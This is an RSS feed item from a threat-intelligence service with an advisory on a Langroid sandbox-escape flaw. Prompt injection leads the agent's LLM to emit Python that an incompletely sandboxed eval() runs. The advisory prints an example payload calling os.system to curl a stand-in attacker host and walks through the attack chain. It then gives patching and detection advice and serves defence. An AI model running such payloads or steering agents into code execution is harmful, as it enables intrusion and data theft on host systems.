<?xml version="1.0" encoding="utf-8" standalone="yes"?><rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/"><channel><title>Langroid (&lt;= 0.65.1) - CraftedSignal Threat Feed</title><link>https://feed.craftedsignal.io/products/langroid--0.65.1/</link><description>Trending threats, MITRE ATT&amp;CK coverage, and detection metadata. Fed continuously.</description><generator>Hugo</generator><language>en</language><managingEditor>hello@craftedsignal.io</managingEditor><webMaster>hello@craftedsignal.io</webMaster><lastBuildDate>Mon, 06 Jul 2026 20:44:54 +0000</lastBuildDate><atom:link href="https://feed.craftedsignal.io/products/langroid--0.65.1/feed.xml" rel="self" type="application/rss+xml"/><item><title>Langroid Sandbox Escape via Incomplete eval() Mitigation</title><link>https://feed.craftedsignal.io/briefs/2026-07-sandbox-escape-langroid/</link><pubDate>Mon, 06 Jul 2026 20:44:54 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-07-sandbox-escape-langroid/</guid><description>Langroid is vulnerable to a critical Remote Code Execution (RCE) in its `TableChatAgent` and `VectorStore` components when `full_eval=True` due to CVE-2026-54769; the `eval()` function fails to properly scrub `__builtins__` from `globals`, allowing attackers to inject `__import__('os').system()` calls via crafted prompt payloads, leading to unauthenticated RCE, unauthorized data access, or system compromise on the host running the Langroid agent.</description><content:encoded><![CDATA[<p>Attackers can exploit a critical sandbox escape vulnerability, CVE-2026-54769, in the Langroid framework (versions &lt;= 0.65.1) to achieve unauthenticated Remote Code Execution (RCE). This flaw specifically affects the <code>TableChatAgent</code> and <code>VectorStore</code> components when configured with <code>full_eval=True</code>. The vulnerability stems from an incomplete mitigation in Python's <code>eval()</code> function, where the <code>__builtins__</code> dictionary is not explicitly scrubbed from <code>globals</code>, despite attempts to set <code>locals</code> to an empty dictionary. This oversight allows attackers to use prompt injection to force the underlying Large Language Model (LLM) to generate tool calls that include <code>__import__('os').system()</code> commands, which are then executed by the vulnerable <code>eval()</code> function in <code>langroid/agent/special/table_chat_agent.py</code> or <code>langroid/vector_store/base.py</code>. This bypass permits arbitrary system command execution, posing a significant risk for data exfiltration, unauthorized database access, or full system compromise.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>An attacker crafts a malicious prompt containing a tool call with an <code>expression</code> field set to a Python <code>os.system()</code> command (e.g., <code>__import__('os').system('curl http://attacker.com/pwned')</code>).</li>
<li>The attacker submits this crafted prompt to a Langroid application instance running a <code>TableChatAgent</code> or <code>VectorStore</code> configured with <code>full_eval=True</code> (e.g., Langroid version &lt;= 0.65.1).</li>
<li>The application's underlying Large Language Model (LLM) processes the malicious prompt and, as instructed, generates a tool message containing the attacker-controlled Python <code>expression</code>.</li>
<li>The Langroid agent's <code>eval()</code> function (specifically within <code>table_chat_agent.py</code> or <code>base.py</code>) attempts to execute this <code>expression</code> using <code>eval(code, vars, {})</code>.</li>
<li>Due to an incomplete sandboxing implementation, where <code>__builtins__</code> are implicitly available via <code>globals</code> despite an empty <code>locals</code> dictionary, the <code>__import__('os').system()</code> call within the <code>expression</code> is successfully resolved and executed.</li>
<li>The <code>os.system()</code> function invokes a new process on the host system to execute the embedded command (e.g., <code>curl</code> for C2 communication or <code>touch</code> for arbitrary file creation).</li>
<li>This unauthenticated command execution achieves Remote Code Execution (RCE), allowing the attacker to interact with the host system's operating system environment.</li>
<li>The RCE enables further actions such as unauthorized data exfiltration, privilege escalation, or full system compromise.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>This vulnerability allows for a complete bypass of the application's intended security boundaries, directly enabling unauthenticated Remote Code Execution. The observed consequences include unauthorized database accesses, data exfiltration, or total system compromise, depending on the privileges of the user environment hosting the vulnerable Langroid agent process. Successful exploitation can lead to significant data breaches, loss of intellectual property, and extensive damage to the affected system and organization.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Patch Langroid to a version greater than 0.65.1 to mitigate CVE-2026-54769.</li>
<li>Block traffic to <code>attacker.com</code> at your network perimeter using the IOC provided in this brief.</li>
<li>Deploy the Sigma rules provided in this brief to detect suspicious process creation activities originating from Python processes.</li>
<li>Enable Sysmon process-creation logging (Event ID 1) on Windows or audit logging for process creation on Linux systems to ensure telemetry for the provided rules.</li>
</ul>
]]></content:encoded><category domain="severity">critical</category><category domain="type">advisory</category><category>rce</category><category>sandbox-escape</category><category>llm</category><category>python</category><category>supply-chain</category></item></channel></rss>